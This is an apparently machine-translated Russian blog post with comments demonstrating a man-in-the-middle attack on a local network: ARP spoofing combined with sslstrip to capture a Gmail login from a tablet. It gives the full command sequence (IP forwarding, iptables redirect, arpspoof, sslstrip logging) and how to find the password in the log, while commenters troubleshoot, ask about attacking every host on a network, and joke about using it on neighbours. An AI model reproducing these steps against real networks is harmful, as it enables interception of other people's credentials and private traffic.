ArpSpoofing и SSlstrip в действии.

Привет, блогеры.

На сегодняшний день у меня есть небольшой пример того, насколько опасным может быть подключение к любой сети без защиты тех, которые нравятся многим из нас.

На сегодня я собираюсь использовать ArpSpoofing с Sslstrip, чтобы получить пароль Gmail. Чтобы сделать среду более контролируемой, я создал учетную запись "testarp@gmail.com».

И поскольку мне не очень нравятся преамбулы, давайте перейдем к делу.

Я не несу ответственности за то, что они могут делать со следующей информацией. Делаю это исключительно в образовательных целях

СРЕДА

Для этого теста у нас есть следующее:

1. Злоумышленник: Это мой настольный или настольный компьютер с Debian Wheezy. Из репозиториев можно установить SSLstrip y нюхать получить иметь арпспуфинг

2. Жертва: Жертва - это Android-планшет, который хочет видеть свою почту только через браузер.

3. Среда: Середина моя Маршрутизатор Cisco DPC2425

АДРЕСА.

Адрес злоумышленника: 172.26.0.2

Адрес маршрутизатора: 172.26.0.1

Адрес жертвы: 172.26.0.8

АТАКА:

Чтобы подробнее понять, как работает атака, вы можете перейти к моему старому POST

Первое, что мы сделаем для этой атаки, - это активируем переадресацию, чтобы наш компьютер мог пересылать информацию жертве, чтобы она не заметила. (В противном случае это была бы атака отказа в обслуживании)

Для этого мы будем использовать:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Каждая команда в прямом окне консоли.

Теперь, если мы сделаем Tail -f desdelinux мы видим информацию в прямом эфире

снимок1

Так как же нам получить то, что мы хотим?

Давайте сначала введем нашу почту на Планшет. Войдя в систему, мы видим, что на нашей консоли появляются тысячи и тысячи вещей.

Теперь, когда все готово, давайте откроем наш файл «desdelinux» с нано

nano desdelinux

с помощью Control + W ищем то, что называется SECURE POST.

И мы увидим нечто подобное.

снимок2

Среди этой огромной строки, которую невозможно увидеть, - адрес электронной почты и пароль жертвы.

Итак, мы бежим вправо, пока наконец не увидим свет в конце туннеля.

снимок3

В другой раз мы увидим, как мы можем немного защитить себя от этих атак.

привет


Оставьте свой комментарий

Ваш электронный адрес не будет опубликован. Обязательные для заполнения поля помечены *

*

*

  1. Ответственный за данные: Мигель Анхель Гатон
  2. Назначение данных: контроль спама, управление комментариями.
  3. Легитимация: ваше согласие
  4. Передача данных: данные не будут переданы третьим лицам, кроме как по закону.
  5. Хранение данных: база данных, размещенная в Occentus Networks (ЕС)
  6. Права: в любое время вы можете ограничить, восстановить и удалить свою информацию.

  1.   @Jlcmux сказал

    Пользуясь случаем, хочу сказать, что когда пост был опубликован, команды были неправильными.

    В команде iptables в конце отсутствует 8080, который находится в другой строке. И тогда все команды arpspoof были в одной строке. Каждая команда находится в отдельной строке.

    Надеюсь, редактор это заметит и сможет исправить.

    Привет.

    1.    Мануэль де ла Фуэнте сказал

      Я внес исправления, о которых вы упомянули, хорошо?

      Если вы собираетесь вставить код в предпочтительную запись, используйте представление HTML и убедитесь, что статья верна, прежде чем отправлять ее в режим ожидания. Спасибо.

  2.   Луис сказал

    Страшно осознавать, что те из нас, у кого нет знаний, настолько уязвимы. Очень хорошая информация, даже когда я плохо разбираюсь в предмете, я осознаю важность. Спасибо!
    привет

  3.   Жискар сказал

    Но это работает, только если злоумышленник и жертва находятся в одной сети. В любом случае мне кажется, что если (находясь в той же сети) вы подключаетесь с использованием HTTPS, этого не происходит, потому что данные зашифрованы ДО того, как покинуть вашу машину. Если вы подключаетесь по HTTP (без S), я думаю, что даже глядя на сетевой кабель, вы видите ключи.

    1.    @Jlcmux сказал

      Это не правда. Я взламываю пароль Gmail, и если вы заметили, что Gmail использует https. Так? Дело в том, что хотя https и безопасен, он зависит от http. Так что это не так уж и безопасно.

      Не надо так сильно признаваться в https, что S не для Супермена, а для "безопасности"

    2.    Ртен сказал

      он работает с https или без него, я пробовал его с более специализированным дистрибутивом linux, и он работает без проблем

    3.    Мануэль де ла Фуэнте сказал

      Вы можете точно использовать его, чтобы преподать урок тем, кто ворует ваш Wi-Fi. 😀

      Это более или менее похоже на то, что они сказали давным-давно в блоге Чема Алонсо:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Вискоза сказал

        Остия, здорово, что он делает! / А потом они рассказывают моему параноику каждый раз, когда я использую VPN, когда они идут проверять банковский счет…). Кстати, вы должны видеть, насколько циничны люди в комментариях ... если в конце концов это воровство ...

        1.    элиотайм3000 сказал

          Теперь нам нужно изучить руководство о том, как создать и предложить свой собственный VPN-сервис.

      2.    Дэниел сказал

        История, на которую вы ссылаетесь, очень интересна, она даже кажется достойной романа, и это заставляет меня вспомнить, когда я пользовался Интернетом своих соседей, и хотя я говорю, что знаю предмет, я думаю, что никогда не смогу увидеть истинные масштабы опасности, которая могла быть у меня. последнее, к счастью для меня, они изменили пароль только на WPA2, и с этого началась моя история с провайдером хаха

    4.    Маврикий сказал

      Вот почему в названии написано, что Sslstrip работает.

      Работает, пока атакующий находится посередине

  4.   скоро сказал

    С какой волной вы работаете с призмой? -.-
    нет.
    Что вы ждете, чтобы отправить запрос XD
    привет
    хороший пост

  5.   АуросZx сказал

    Интересно, позже сделаю обучающий тест ... Может, еще удастся снять пароль от WiFi и немного повеселиться 😛
    Не могли бы вы сделать что-то подобное, чтобы отправить разные страницы на те, которые запрашивала цель? Например, они хотят открыть Facebook, а я перенаправляю их в Google? 😛

    1.    @Jlcmux сказал

      Да. Но это все совсем другой ролл.

      Может позже выложу.

  6.   последний новичок сказал

    очень хороший пост, эти темы очень познавательные, теперь нам нужно иметь возможность противодействовать этой атаке, поскольку некоторые (например, я) подключаются к общедоступным сетям (например, университет), было бы полезно избежать этого.

    Привет!

  7.   просто-другой-dl-user сказал

    У меня не получилось 🙁

  8.   Woqer сказал

    Что-то здесь меня не подводит, кроме того факта, что https-соединения зашифрованы с помощью сертификата сервера (если у вас есть сертификат на вашем компьютере, ваш браузер отвечает за шифрование) с iptables вы перенаправляете порт 80 (http) , а не 443, который является https

    1.    @Jlcmux сказал

      Я тоже так думал. Дело в том, что, хотя https и «безопасен», он, к сожалению, зависит от http. Таким образом, sslstrip использует это преимущество, заставляя браузер полагать, что он использует учетные данные https, но это не так.

      1.    Woqer сказал

        Ебена мать! но браузер должен увидеть предупреждение типа «этот сертификат пришел с подозрительного сайта или что-то в этом роде» ... Мне обязательно нужно будет сделать тесты XD

        1.    @Jlcmux сказал

          Нет, абсолютно ничего не выходит.

  9.   просто-другой-dl-user сказал

    Наконец-то это сработало для меня
    Я подключен к сети WEP с паролем, и он все равно показал мне пароль напрямую.

    Запрос. Можете ли вы проделать ту же процедуру, но для всех компьютеров, подключенных к сети, вместо одной жертвы?

    1.    @Jlcmux сказал

      Да, ты можешь. Но я не проводил экспериментов. Попробуйте сами и расскажите, как у вас дела.

  10.   Синник19 сказал

    Единственное, что я получаю, это то, что машина жертвы отключается, но sslstrip ничего мне не показывает: /

    1.    @Jlcmux сказал

      Вам нужно на время отключить брандмауэр. Или хотя бы разрешить входящие соединения.

  11.   Г-н Черный сказал

    Мы с Probe могли видеть только имя пользователя и пароль страницы facebook, в gmail я не нашел результатов в журнале, также мне нужна была только строка arpspoof «arpspoof -i -t«. С другой стороны, машина-жертва не могла открыть некоторые страницы. Я продолжу расследование, это очень интересно. В помощь тем, кто использует Manjaro, нужно установить следующие пакеты: dsniff (здесь arpspoff), twisted и python2-pyopenssl. Sslstrip можно скачать отсюда: http://www.thoughtcrime.org/software/sslstrip/
    Чтобы запустить его $ python2 sslstrip.py
    Привет.

  12.   Г-н Черный сказал

    Не получилось, но строка arpspoof такая: #arpspoof -i int -t ip-жертва ip-router

  13.   Гильберт сказал

    смотри, я делаю именно то, что ты говоришь:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    арспуф -i eth0 -t 172.26.0.8 172.26.0.1
    арспуф -i eth0 -t 172.26.0.1 172.26.0.2

    Проблема в том, что жертва, которая является другим компьютером, который у меня есть здесь, в моей комнате, осталась без подключения к точке, что мне нужно перезапустить маршрутизатор, что я могу сделать, помогите мне.

    Еще я работаю с виртуальной машиной, и когда я выполняю команду iwconfig, ни wlan0 не появляется, ни когда я выполняю ifconfig, однако, если у меня есть Интернет на моей виртуальной машине, то с интерфейсом eth0.